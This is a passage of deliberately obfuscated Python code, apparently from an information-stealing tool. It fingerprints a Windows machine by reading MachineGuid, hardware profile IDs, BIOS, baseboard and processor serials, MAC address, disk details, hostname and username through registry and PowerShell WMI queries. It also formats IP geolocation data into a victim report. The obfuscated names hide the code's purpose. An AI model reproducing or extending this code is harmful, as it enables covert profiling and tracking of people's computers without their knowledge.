    LBPUKSYYAHSFYHRMBFKSREEGUJBNZCPTKXYMDJPBKSSENTRTYZFKYKROYRMTESQCBOHJHA = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('country', "None")
    LBPUKSYYAHSFYHRMBFKSREEGUJBNZCPTKXYMDJPBKSSENTRTYZFKYKROYRMTESQCBOHJHA_code = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('countryCode', "None")
    IMNJQIGDUFLWRCYYUDNCHNXNVXRKIUERAWAQTGVTXPQCYYCAACKGKGGIL = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('regionName', "None")
    IMNJQIGDUFLWRCYYUDNCHNXNVXRKIUERAWAQTGVTXPQCYYCAACKGKGGIL_code = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('region', "None")
    ZMNFRKXUIEOWSGEGVIQYMDHFMMBNAGZANSBZPQHNJOJEDWPZNGBIHWSAIWANZNAZOXPKUGGFWTX = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('zip', "None")
    UBQLUUKHVSVMPDZENHCXHVPKCHKTSQFVVXAYRLMSESMMVXKVLMVTZ = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('city', "None")
    LHQSWDSBJQHKAWLBZPBCCVSFOFSBIZHOYWEAARSDNITYCCKHHWYKNTUNPRSVTIQRJZGBTVQFCACATQQT = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('lat', "None")
    KTWTMQFPHUAIQGONJGXXJVUBPQPKXGOWHNWGKFLKDBMPEXZFHHTWHGSGQMZM = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('lon', "None")
    ICIBWHRNSGGKRCQXAWECYHDPYCAIHVRLKUCQPXZUOOINPTDWAD = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('timezone', "None")
    UIVQRVNUAUEOLYMVYRUAZVKMBZLQYWLKUBIHECJFIOMXRGBVNWDSVKQVQOJPUJHKEYKPLDCZVHRWXPXSHGQDPCWE = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('isp', "None")
    PQRFOHEEUGTRQFUBGMXXAFLTAOJWXBYJCALGWWAPPLJCOZSHJHBTKQCTXHDZYKCQKUAYEPLUSL = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('org', "None")
    CJKOWOBQIZNNZMLTMPHGLBSWWJNZMLYZXEBKKCHSIEIQZXXLIDHHPYMWHEQLHEJWSWARAGFQGMDGO = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('as', "None")

def QZDVYNJVUBGAVSWJOCQUDYUHWNNJDYJNRLKLEOKHYLTCJOPZYHHFRFP(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF):
    import platform
    import subprocess
    import uuid
    import psutil
    import GPUtil
    import ctypes
    import win32api
    import string
    import screeninfo
    import winreg

    try: XZCIZVSWPPYXNKOJCAAMVKLKOIOGDGBXDCIKYPAEKUNGOGFDFJFYSAUQOXFWIMEAINSFPKCSMQZITPOUOKZTICBVTNDGJMNVYIEV = platform.system()
    except: XZCIZVSWPPYXNKOJCAAMVKLKOIOGDGBXDCIKYPAEKUNGOGFDFJFYSAUQOXFWIMEAINSFPKCSMQZITPOUOKZTICBVTNDGJMNVYIEV = "None"

    try: JSKNNHPWHCDVJFQKLIBTNHADNZPENUXAXOSNMVZXWTSXJTSGQPDOSGOEHAWBKWTLUJKTVXLGFFOL = platform.version()
    except: JSKNNHPWHCDVJFQKLIBTNHADNZPENUXAXOSNMVZXWTSXJTSGQPDOSGOEHAWBKWTLUJKTVXLGFFOL = "None"

    try: ZKKGRJOIQNHJOENUCWYQHNSASWQPAVITZEHXUHHSXCPYNDOIDDCSTPLCYBZBLOXHAARSCNWMQCFZEVKFZCNXYDC = ':'.join(['{:02x}'.format((uuid.getnode() >> elements) & 0xff) for elements in range(0,2*6,2)][::-1])
    except: ZKKGRJOIQNHJOENUCWYQHNSASWQPAVITZEHXUHHSXCPYNDOIDDCSTPLCYBZBLOXHAARSCNWMQCFZEVKFZCNXYDC = "None"

    try: TQJMMMGGBOKUSPKYYHFZRFNBPLPXPXRAQTHAMBGWZHKZCDUXRHGWWLZBIRIZMDWLOFDLBJUXEUQEPGZOSKPUSBFWJEYGQ = str(round(psutil.virtual_memory().total / (1024**3), 2)) + "Go"
    except: TQJMMMGGBOKUSPKYYHFZRFNBPLPXPXRAQTHAMBGWZHKZCDUXRHGWWLZBIRIZMDWLOFDLBJUXEUQEPGZOSKPUSBFWJEYGQ = "None"

    try: DJDIRXRYEAJCSHBAOXILQSIREYDMWUPKCZVIDLAYOTIOHCLOCMXFFIYSNYRUBUCFOCQ = platform.processor()
    except: DJDIRXRYEAJCSHBAOXILQSIREYDMWUPKCZVIDLAYOTIOHCLOCMXFFIYSNYRUBUCFOCQ = "None"

    try: EEUXLAEFPLTSWRBEWFPNUFBCPFJNQVKJRTKLMAMXMCZHZJDKKYV = str(psutil.cpu_count(logical=False)) + " Core"
    except: EEUXLAEFPLTSWRBEWFPNUFBCPFJNQVKJRTKLMAMXMCZHZJDKKYV = "None"

    try: TUYETLQUISPNZEICXSJMJYVGDFYCKROYZUZWQKHPEJWARXHAGWTRQWIVQWBYGKSSGUMBCJ = GPUtil.getGPUs()[0].name if GPUtil.getGPUs() else "None"
    except: TUYETLQUISPNZEICXSJMJYVGDFYCKROYZUZWQKHPEJWARXHAGWTRQWIVQWBYGKSSGUMBCJ = "None"

    ZSXTKQTGFKYFAPUSDUORLXXJNSFQQTKVWXTIOVLAJOBKGWXWLXOHUEFFRTIHHEGTSHA                 = r"SOFTWARE\Microsoft\Cryptography"
    IHVTIFQUERKMHUOBFHLCACCNXGWXNZFPBEVAPTUYHBXHWBJSCQONLZGGEJHMOAOWEVFQNDMPQDUAJGVY                    = r"SOFTWARE\Microsoft\SQMClient"
    JNTZIAUCLWABZDOBKCVTGAHEAHNFZKJHZKIBHLBGYVXOIUNANJFLSBBHOMUMOHELVHGYORPNFCWTPGCJOLZOAOQAGZCFXRRKZD             = r"SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware Profiles\0001"
    LYPMTTHPUECZVMCOVSQWGPKUFUVARAEOKHQZKJKEQLDSYZBTSRUORZ                       = r'SOFTWARE\NVIDIA Corporation'
    UARUBRCCNRBQKMCHGRPULSPYSYRIERGMPWSPBUEFKRHRSHVHJUMKP               = r'SYSTEM\HardwareConfig\Current'

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, ZSXTKQTGFKYFAPUSDUORLXXJNSFQQTKVWXTIOVLAJOBKGWXWLXOHUEFFRTIHHEGTSHA, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "MachineGuid")
            LDDODOJPAYKVVBNGMOPGBYLDOTBAATTFOCNYABVLOMYHJKNCMHTMCPHGMSMIEBAICATZNUFQOEMDFRIBHLSUNQKZL = str(v4r_value).replace("{", "").replace("}", "")
    except: LDDODOJPAYKVVBNGMOPGBYLDOTBAATTFOCNYABVLOMYHJKNCMHTMCPHGMSMIEBAICATZNUFQOEMDFRIBHLSUNQKZL = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, JNTZIAUCLWABZDOBKCVTGAHEAHNFZKJHZKIBHLBGYVXOIUNANJFLSBBHOMUMOHELVHGYORPNFCWTPGCJOLZOAOQAGZCFXRRKZD, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "GUID")
            WNGTUQVDVSLTNVRHJZGSOPONLMCMDHTXPNZACAOPWQDSBCFFQRMJLTAWEMTWFMRNKWALVXNE = str(v4r_value).replace("{", "").replace("}", "")
    except: WNGTUQVDVSLTNVRHJZGSOPONLMCMDHTXPNZACAOPWQDSBCFFQRMJLTAWEMTWFMRNKWALVXNE = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, JNTZIAUCLWABZDOBKCVTGAHEAHNFZKJHZKIBHLBGYVXOIUNANJFLSBBHOMUMOHELVHGYORPNFCWTPGCJOLZOAOQAGZCFXRRKZD, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "HwProfileGuid")
            KBGKFIPRCFVRTMCIJNDVHXJRUHAXBBSHNEFBYWHJIODUQWAONDSCBKJIXNYFTQCZJNOUCYAXYBUQMZQGXUORRNDQFEKOGAIW = str(v4r_value).replace("{", "").replace("}", "")
    except: KBGKFIPRCFVRTMCIJNDVHXJRUHAXBBSHNEFBYWHJIODUQWAONDSCBKJIXNYFTQCZJNOUCYAXYBUQMZQGXUORRNDQFEKOGAIW = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, IHVTIFQUERKMHUOBFHLCACCNXGWXNZFPBEVAPTUYHBXHWBJSCQONLZGGEJHMOAOWEVFQNDMPQDUAJGVY, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "MachineId")
            KXTGQDBTNIEHLESCJYOYBHRZCFLCXGLHAKISUBGEERPRMWYNSCKMKANFIOXTQLWNM = str(v4r_value).replace("{", "").replace("}", "")
    except: KXTGQDBTNIEHLESCJYOYBHRZCFLCXGLHAKISUBGEERPRMWYNSCKMKANFIOXTQLWNM = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, LYPMTTHPUECZVMCOVSQWGPKUFUVARAEOKHQZKJKEQLDSYZBTSRUORZ+r'\Installer2', 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "SystemID")
            EANUNJVNGOYVCNKFHAELVUIIKOJKEJDMDVONGORQNVTTBGWMTDOJMDBFKIOYMQ = str(v4r_value).replace("{", "").replace("}", "")
    except: EANUNJVNGOYVCNKFHAELVUIIKOJKEJDMDVONGORQNVTTBGWMTDOJMDBFKIOYMQ = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UARUBRCCNRBQKMCHGRPULSPYSYRIERGMPWSPBUEFKRHRSHVHJUMKP, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "BaseBoardProduct")
            HFYVGEQUXBHZCCUNNEGJPJLDEBZHCTKMMASLTXZVDDQWMGTAMSUJZRTOLEL = str(v4r_value).replace("{", "").replace("}", "")
    except: HFYVGEQUXBHZCCUNNEGJPJLDEBZHCTKMMASLTXZVDDQWMGTAMSUJZRTOLEL = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UARUBRCCNRBQKMCHGRPULSPYSYRIERGMPWSPBUEFKRHRSHVHJUMKP, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "BaseBoardManufacturer")
            USJGDTMWWZEMEZPNXGSNRGTFLJVDEQHRWGVEMVYVRDNHNJXXQUWCUSZJAEBOVTRTJDKLIKOASL = str(v4r_value).replace("{", "").replace("}", "")
    except: USJGDTMWWZEMEZPNXGSNRGTFLJVDEQHRWGVEMVYVRDNHNJXXQUWCUSZJAEBOVTRTJDKLIKOASL = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UARUBRCCNRBQKMCHGRPULSPYSYRIERGMPWSPBUEFKRHRSHVHJUMKP, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "BIOSReleaseDate")
            VAGBUDHYEBNUJWXPYUPCZPNIXVWQPEYQOTXOLBKYBRABTTJDCKZJLMFJHOMFGTCOMWCJ = str(v4r_value).replace("{", "").replace("}", "")
    except: VAGBUDHYEBNUJWXPYUPCZPNIXVWQPEYQOTXOLBKYBRABTTJDCKZJLMFJHOMFGTCOMWCJ = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UARUBRCCNRBQKMCHGRPULSPYSYRIERGMPWSPBUEFKRHRSHVHJUMKP, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "BIOSVersion")
            QSUVDXNZYHUBGOBPHDHXWMJXHSCKATFNDUONSTKYHIBNQBHSKOCSXQGOPFQDGJQUFHVZWUR = str(v4r_value).replace("{", "").replace("}", "")
    except: QSUVDXNZYHUBGOBPHDHXWMJXHSCKATFNDUONSTKYHIBNQBHSKOCSXQGOPFQDGJQUFHVZWUR = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UARUBRCCNRBQKMCHGRPULSPYSYRIERGMPWSPBUEFKRHRSHVHJUMKP, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "SystemBiosVersion")
            QBQSDKROASOTHOSCRFNSPBMFLNBWXUJDYDFLJSUVQBHHHGSSSXLLHEBNSXNIWJIRBXKGUSJBKLZVIXTDDOYYSTTMF = str(v4r_value).replace("{", "").replace("}", "")
    except: QBQSDKROASOTHOSCRFNSPBMFLNBWXUJDYDFLJSUVQBHHHGSSSXLLHEBNSXNIWJIRBXKGUSJBKLZVIXTDDOYYSTTMF = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UARUBRCCNRBQKMCHGRPULSPYSYRIERGMPWSPBUEFKRHRSHVHJUMKP, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "SystemVersion")
            LQOJTQSCYFGAGAFWXSWPTNOQFLWWSVDBMUPZPXDGLHXBIVSDOEDJORED = str(v4r_value).replace("{", "").replace("}", "")
    except: LQOJTQSCYFGAGAFWXSWPTNOQFLWWSVDBMUPZPXDGLHXBIVSDOEDJORED = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UARUBRCCNRBQKMCHGRPULSPYSYRIERGMPWSPBUEFKRHRSHVHJUMKP, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "SystemFamily")
            MEMAYKKSPYCKBBWIQZKFERYZBBLOOWHIFVGMNFXKLYIMDRACGUSOQCKWVRYQHSOKWPIUSSZBKEDZFQK = str(v4r_value).replace("{", "").replace("}", "")
    except: MEMAYKKSPYCKBBWIQZKFERYZBBLOOWHIFVGMNFXKLYIMDRACGUSOQCKWVRYQHSOKWPIUSSZBKEDZFQK = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UARUBRCCNRBQKMCHGRPULSPYSYRIERGMPWSPBUEFKRHRSHVHJUMKP, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "SystemManufacturer")
            OWFNLZETFFJWRZQISUJCGVLOIGPWTHYSQFRSQIVPXBJCNJATMYJFODSOVMOWNRLBHWLVQY = str(v4r_value).replace("{", "").replace("}", "")
    except: OWFNLZETFFJWRZQISUJCGVLOIGPWTHYSQFRSQIVPXBJCNJATMYJFODSOVMOWNRLBHWLVQY = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UARUBRCCNRBQKMCHGRPULSPYSYRIERGMPWSPBUEFKRHRSHVHJUMKP, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "SystemProductName")
            FUHZOEVNVWMXGPHFNKVUYIZJDNGLQWDZZUBRAXRUESPEZGOGUIUBYTACZECSBFH = str(v4r_value).replace("{", "").replace("}", "")
    except: FUHZOEVNVWMXGPHFNKVUYIZJDNGLQWDZZUBRAXRUESPEZGOGUIUBYTACZECSBFH = None

    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UARUBRCCNRBQKMCHGRPULSPYSYRIERGMPWSPBUEFKRHRSHVHJUMKP, 0, winreg.KEY_READ) as key:
            v4r_value, v4r_reg_type = winreg.QueryValueEx(key, "SystemSKU")
            TNNPCIEDXQCOJJTKIEALBIVDZDOXOJNRBYJMODJKKALEPBPKWPFASBQQCTEQEYIYYXDKTHTFRDUVTNRWUKSKI = str(v4r_value).replace("{", "").replace("}", "")
    except: TNNPCIEDXQCOJJTKIEALBIVDZDOXOJNRBYJMODJKKALEPBPKWPFASBQQCTEQEYIYYXDKTHTFRDUVTNRWUKSKI = None

    def RunPowershell(query):
        try:
            result = subprocess.check_output(
                ['powershell', '-Command', query],
                stderr=subprocess.STDOUT,
                text=True
            ).split('\n')[0].strip()
            return result if result else None
        except:
            return None

    try: WBEPODJIOFAUINRRGAZJHLFPTJKHTGBBUWMLTMMQEANCABDTTW = RunPowershell("(Get-WmiObject -Class Win32_ComputerSystemProduct).UUID")
    except: WBEPODJIOFAUINRRGAZJHLFPTJKHTGBBUWMLTMMQEANCABDTTW = None

    try: LCXQTKANYBGVAZOTOWYVQIKCRJSLBWJODIPRBBWXPZYIGVYWIODFMSKPWTAJTVIYMEJUWODPYHY = RunPowershell("(Get-WmiObject -Class Win32_BIOS).SerialNumber")
    except: LCXQTKANYBGVAZOTOWYVQIKCRJSLBWJODIPRBBWXPZYIGVYWIODFMSKPWTAJTVIYMEJUWODPYHY = None

    try: VACZNTPNQTWMWIRRENQMMYKNKYUDQCLQSTKSNSZEVXZPSQGECQTBZVMHMGVISXRONJOUVF = RunPowershell("(Get-WmiObject -Class Win32_BaseBoard).SerialNumber")
    except: VACZNTPNQTWMWIRRENQMMYKNKYUDQCLQSTKSNSZEVXZPSQGECQTBZVMHMGVISXRONJOUVF = None

    try: QZTREBGPKCQPAYSOWTDWSHNMUGAWOSVESURGIROOJZSPXXKMYUZJPTTNI = RunPowershell("(Get-WmiObject -Class Win32_Processor).ProcessorId")
    except: QZTREBGPKCQPAYSOWTDWSHNMUGAWOSVESURGIROOJZSPXXKMYUZJPTTNI = None

    try: WQORVWKFHDHCDHBITWXOIZCNBAKVQBUEFCTDYZPEUYHQWVDXNBBPCWLECUQTSLAJMMELHSDIWOMDW = RunPowershell("(Get-WmiObject -Class Win32_BIOS).OEMStringArray")
    except: WQORVWKFHDHCDHBITWXOIZCNBAKVQBUEFCTDYZPEUYHQWVDXNBBPCWLECUQTSLAJMMELHSDIWOMDW = None

    try: XIQIGDSPBEUKMHWPXZQYRITLNLFUAHOQVZBBMGNWABPFMKZTLZELYLZHMHRDCEKSXGKHABKQIUQINMOWWEMLSGNUADUWPFVKXACC = RunPowershell("(Get-WmiObject -Class Win32_SystemEnclosure).SMBIOSAssetTag")
    except: XIQIGDSPBEUKMHWPXZQYRITLNLFUAHOQVZBBMGNWABPFMKZTLZELYLZHMHRDCEKSXGKHABKQIUQINMOWWEMLSGNUADUWPFVKXACC = None
        
    try:
        LDFNYKNQSANAVKCFLYAZMDEXKYXEBQMFDWWUBBMHXTRGSAKKLWUIJZHOWAWHMVHPZI = []
        ACEHFRUXMIFGWYIRLTNMKTOMELJNROBLEZMMLFKBELLAQXFXETCGRJLCZNZRPSDWPCQLWFUZZZOFPJFRKZG = ctypes.windll.kernel32.GetLogicalDrives()
        for v4r_letter in string.ascii_uppercase:
            if ACEHFRUXMIFGWYIRLTNMKTOMELJNROBLEZMMLFKBELLAQXFXETCGRJLCZNZRPSDWPCQLWFUZZZOFPJFRKZG & 1:
                BKMLLZXBXALKJDWEMKNMOLTHZTGTBOBEOKIZTUVXYKQFFIHNDGYIGQHFQGYCYIL = v4r_letter + ":\\"
                try:
                    IQQBVKNABWQGFKCLWCZKUWJYPVZWQMCHUFQDHCIQJHZEFTNSYMFYZKZSPNZWYYIT = ctypes.c_ulonglong(0)
                    KDCMCOOWSFBZISYWPKTQACGWKUBZDTJXZSSLFHAOEJVNUTSUHQQPPERRDBXAEXGOFFYPHLDOUAIVLQSHPOH = ctypes.c_ulonglong(0)
                    ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(BKMLLZXBXALKJDWEMKNMOLTHZTGTBOBEOKIZTUVXYKQFFIHNDGYIGQHFQGYCYIL), None, ctypes.pointer(KDCMCOOWSFBZISYWPKTQACGWKUBZDTJXZSSLFHAOEJVNUTSUHQQPPERRDBXAEXGOFFYPHLDOUAIVLQSHPOH), ctypes.pointer(IQQBVKNABWQGFKCLWCZKUWJYPVZWQMCHUFQDHCIQJHZEFTNSYMFYZKZSPNZWYYIT))
                    JPCBIYTAJQZQLNALHNIJIYBIFTUXTCBURMCOBICQQDQKACSRHTCXQMESIEECPQGSDKSBAANACAKADQSBXWVNMFZSK = KDCMCOOWSFBZISYWPKTQACGWKUBZDTJXZSSLFHAOEJVNUTSUHQQPPERRDBXAEXGOFFYPHLDOUAIVLQSHPOH.value
                    JBNZVESJCWYIMRIRPMWYWQLAPVKXCRFEXXKLGODBJWGZZFGXQKS = IQQBVKNABWQGFKCLWCZKUWJYPVZWQMCHUFQDHCIQJHZEFTNSYMFYZKZSPNZWYYIT.value
                    AEXRTYOLYAIGZAAMHFSELBKHEUQLUPQPTXCCBFRECXQVXEAISBNLGHJNARNLESROJAVKCVMMV = JPCBIYTAJQZQLNALHNIJIYBIFTUXTCBURMCOBICQQDQKACSRHTCXQMESIEECPQGSDKSBAANACAKADQSBXWVNMFZSK - JBNZVESJCWYIMRIRPMWYWQLAPVKXCRFEXXKLGODBJWGZZFGXQKS
                    OLFODLXBIEEVYCDLYJLKVEEEAKEZKZPCIHYFUGPRPQROXKKYITDVDRXEECXVKJEWZIWKVMT = win32api.GetVolumeInformation(BKMLLZXBXALKJDWEMKNMOLTHZTGTBOBEOKIZTUVXYKQFFIHNDGYIGQHFQGYCYIL)[0]
                    drive = {
                        'drive': BKMLLZXBXALKJDWEMKNMOLTHZTGTBOBEOKIZTUVXYKQFFIHNDGYIGQHFQGYCYIL,
                        'total': JPCBIYTAJQZQLNALHNIJIYBIFTUXTCBURMCOBICQQDQKACSRHTCXQMESIEECPQGSDKSBAANACAKADQSBXWVNMFZSK,
                        'free': JBNZVESJCWYIMRIRPMWYWQLAPVKXCRFEXXKLGODBJWGZZFGXQKS,
                        'used': AEXRTYOLYAIGZAAMHFSELBKHEUQLUPQPTXCCBFRECXQVXEAISBNLGHJNARNLESROJAVKCVMMV,
                        'name': OLFODLXBIEEVYCDLYJLKVEEEAKEZKZPCIHYFUGPRPQROXKKYITDVDRXEECXVKJEWZIWKVMT,
                    }
                    LDFNYKNQSANAVKCFLYAZMDEXKYXEBQMFDWWUBBMHXTRGSAKKLWUIJZHOWAWHMVHPZI.append(drive)
                except:
                    ()
            ACEHFRUXMIFGWYIRLTNMKTOMELJNROBLEZMMLFKBELLAQXFXETCGRJLCZNZRPSDWPCQLWFUZZZOFPJFRKZG >>= 1

        RCBFYQLVJRNNLQWLNHOBXUREICETPBVLSFJLNFQLWMFQQLUETPDUJRKQYCFJ = "   {:<7} {:<10} {:<10} {:<10} {:<20}".format("Drive:", "Free:", "Total:", "Use:", "Name:")
        for v4r_drive in LDFNYKNQSANAVKCFLYAZMDEXKYXEBQMFDWWUBBMHXTRGSAKKLWUIJZHOWAWHMVHPZI:
            LXGVHBKGXVUYLYOCVKJYBVKOTDHGQCHHZGWHTFLSLLPXGBMZUJRNLKUSIDKDKRQUYROQSOMXJTIWIUEMFMXLQZKRVWVJAXSZ = (v4r_drive['used'] / v4r_drive['total']) * 100
            JBNZVESJCWYIMRIRPMWYWQLAPVKXCRFEXXKLGODBJWGZZFGXQKS_gb = "{:.2f}GO".format(v4r_drive['free'] / (1024 ** 3))
            JPCBIYTAJQZQLNALHNIJIYBIFTUXTCBURMCOBICQQDQKACSRHTCXQMESIEECPQGSDKSBAANACAKADQSBXWVNMFZSK_gb = "{:.2f}GO".format(v4r_drive['total'] / (1024 ** 3))
            LXGVHBKGXVUYLYOCVKJYBVKOTDHGQCHHZGWHTFLSLLPXGBMZUJRNLKUSIDKDKRQUYROQSOMXJTIWIUEMFMXLQZKRVWVJAXSZ_str = "{:.2f}%".format(LXGVHBKGXVUYLYOCVKJYBVKOTDHGQCHHZGWHTFLSLLPXGBMZUJRNLKUSIDKDKRQUYROQSOMXJTIWIUEMFMXLQZKRVWVJAXSZ)
            RCBFYQLVJRNNLQWLNHOBXUREICETPBVLSFJLNFQLWMFQQLUETPDUJRKQYCFJ += "\n - {:<7} {:<10} {:<10} {:<10} {:<20}".format(v4r_drive['drive'], 
                                                                   JBNZVESJCWYIMRIRPMWYWQLAPVKXCRFEXXKLGODBJWGZZFGXQKS_gb,
                                                                   JPCBIYTAJQZQLNALHNIJIYBIFTUXTCBURMCOBICQQDQKACSRHTCXQMESIEECPQGSDKSBAANACAKADQSBXWVNMFZSK_gb,
                                                                   LXGVHBKGXVUYLYOCVKJYBVKOTDHGQCHHZGWHTFLSLLPXGBMZUJRNLKUSIDKDKRQUYROQSOMXJTIWIUEMFMXLQZKRVWVJAXSZ_str,
                                                                   v4r_drive['name'])
    except:
        RCBFYQLVJRNNLQWLNHOBXUREICETPBVLSFJLNFQLWMFQQLUETPDUJRKQYCFJ = """   Drive:  Free:      Total:     Use:       Name:       
   None    None       None       None       None     
"""

    try:
        def IsPortable():
            try:
                battery = psutil.sensors_battery()
                return battery is not None and battery.power_plugged is not None
            except AttributeError:
                return False

        if IsPortable():
            SREYPGNACOMLXJJSHNJUIDJPVWHXBVOOALZVGJRBZYMGSJTRWSFAE = 'Pc Portable'
        else:
            SREYPGNACOMLXJJSHNJUIDJPVWHXBVOOALZVGJRBZYMGSJTRWSFAE = 'Pc Fixed'
    except:
        SREYPGNACOMLXJJSHNJUIDJPVWHXBVOOALZVGJRBZYMGSJTRWSFAE = "None"

    try: TNCRVMZDSLCIASGOCZEWTDTLPVBZPOWLCMBLNMEURAIHNETXKFYQQUPBUPYMAIGMWUUPSIBXHSNGYJ = len(screeninfo.get_monitors())
    except: TNCRVMZDSLCIASGOCZEWTDTLPVBZPOWLCMBLNMEURAIHNETXKFYQQUPBUPYMAIGMWUUPSIBXHSNGYJ = "None"

    XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_system_info = "Yes"
    TFPPPRUKSZQGHVFDVMUUGKFZLZJQKCCFNXCAEXMEVOIKGELIZORQHJBHJGZSVXYHLZNDHCEEIKVLZPLNJ = f"""
User Pc:
 - Hostname    : {WVQMJRGMABILADTYKHWPLQNKUVZSITQVRQNNBSGJGPCTTLSPKPXXFCHPDDGVQFCSCYLGZKTWEDMKCJQQWXKMI}
 - Username    : {DMMOPUYEEXWJVPYKMTRQCTSTCJKOCJYRVLVHTTNVDBOSOUPSJTBYCOFUKVPZMRTVAWOBQLYIQAOQZWFOTRGOPCPEKGKRLGIAZY}
 - DisplayName : {FJJCANLPAYLDYZMMUTZLZHCYLNCBYPFAMAMCWWSXSGKQRNWMWUKYTHIBEICPRGEAVFZMPXSWOYGZLIRHL}

System:
 - Plateform     : {SREYPGNACOMLXJJSHNJUIDJPVWHXBVOOALZVGJRBZYMGSJTRWSFAE}
 - Exploitation  : {XZCIZVSWPPYXNKOJCAAMVKLKOIOGDGBXDCIKYPAEKUNGOGFDFJFYSAUQOXFWIMEAINSFPKCSMQZITPOUOKZTICBVTNDGJMNVYIEV} {JSKNNHPWHCDVJFQKLIBTNHADNZPENUXAXOSNMVZXWTSXJTSGQPDOSGOEHAWBKWTLUJKTVXLGFFOL}
 - Screen Number : {TNCRVMZDSLCIASGOCZEWTDTLPVBZPOWLCMBLNMEURAIHNETXKFYQQUPBUPYMAIGMWUUPSIBXHSNGYJ}

Peripheral:
 - CPU : {DJDIRXRYEAJCSHBAOXILQSIREYDMWUPKCZVIDLAYOTIOHCLOCMXFFIYSNYRUBUCFOCQ}, {EEUXLAEFPLTSWRBEWFPNUFBCPFJNQVKJRTKLMAMXMCZHZJDKKYV} 
 - GPU : {TUYETLQUISPNZEICXSJMJYVGDFYCKROYZUZWQKHPEJWARXHAGWTRQWIVQWBYGKSSGUMBCJ}
 - RAM : {TQJMMMGGBOKUSPKYYHFZRFNBPLPXPXRAQTHAMBGWZHKZCDUXRHGWWLZBIRIZMDWLOFDLBJUXEUQEPGZOSKPUSBFWJEYGQ}

Disk:
{RCBFYQLVJRNNLQWLNHOBXUREICETPBVLSFJLNFQLWMFQQLUETPDUJRKQYCFJ}

Serial Number:
 - MAC                       : {ZKKGRJOIQNHJOENUCWYQHNSASWQPAVITZEHXUHHSXCPYNDOIDDCSTPLCYBZBLOXHAARSCNWMQCFZEVKFZCNXYDC}
 - Machine Id                : {KXTGQDBTNIEHLESCJYOYBHRZCFLCXGLHAKISUBGEERPRMWYNSCKMKANFIOXTQLWNM}
 - Machine Guid              : {LDDODOJPAYKVVBNGMOPGBYLDOTBAATTFOCNYABVLOMYHJKNCMHTMCPHGMSMIEBAICATZNUFQOEMDFRIBHLSUNQKZL}
 - Hw Profile Guid           : {KBGKFIPRCFVRTMCIJNDVHXJRUHAXBBSHNEFBYWHJIODUQWAONDSCBKJIXNYFTQCZJNOUCYAXYBUQMZQGXUORRNDQFEKOGAIW}
 - Nvidia System Id          : {EANUNJVNGOYVCNKFHAELVUIIKOJKEJDMDVONGORQNVTTBGWMTDOJMDBFKIOYMQ}
